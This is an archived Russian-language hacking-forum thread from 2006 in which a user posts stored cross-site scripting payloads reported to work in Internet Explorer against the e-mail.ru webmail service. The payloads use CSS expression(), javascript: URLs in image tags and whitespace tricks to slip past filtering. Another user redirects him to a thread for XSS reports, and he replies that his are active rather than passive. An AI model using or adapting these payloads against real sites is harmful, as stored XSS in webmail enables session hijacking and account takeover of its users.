PDA

Просмотр полной версии : xss на e-mail.ru(актив)

VampiRUS
17.12.2006, 09:51
<span style=top:expression(alert())></span>
<span sss="alert();this.sss=null" style=top:expression(eval(this.sss));></span>
<img src=javascript:alert()>
<img src="javascript :alert()"> и прочие извращения с пробелами и табуляцией

работают в ie.
†Romi4†
17.12.2006, 10:09
тебе сюда:
http://forum.antichat.ru/thread21437.html
VampiRUS
17.12.2006, 10:14
ну это актив, а не пасив. А там постятся пассивные xss на сколько я смог заметить.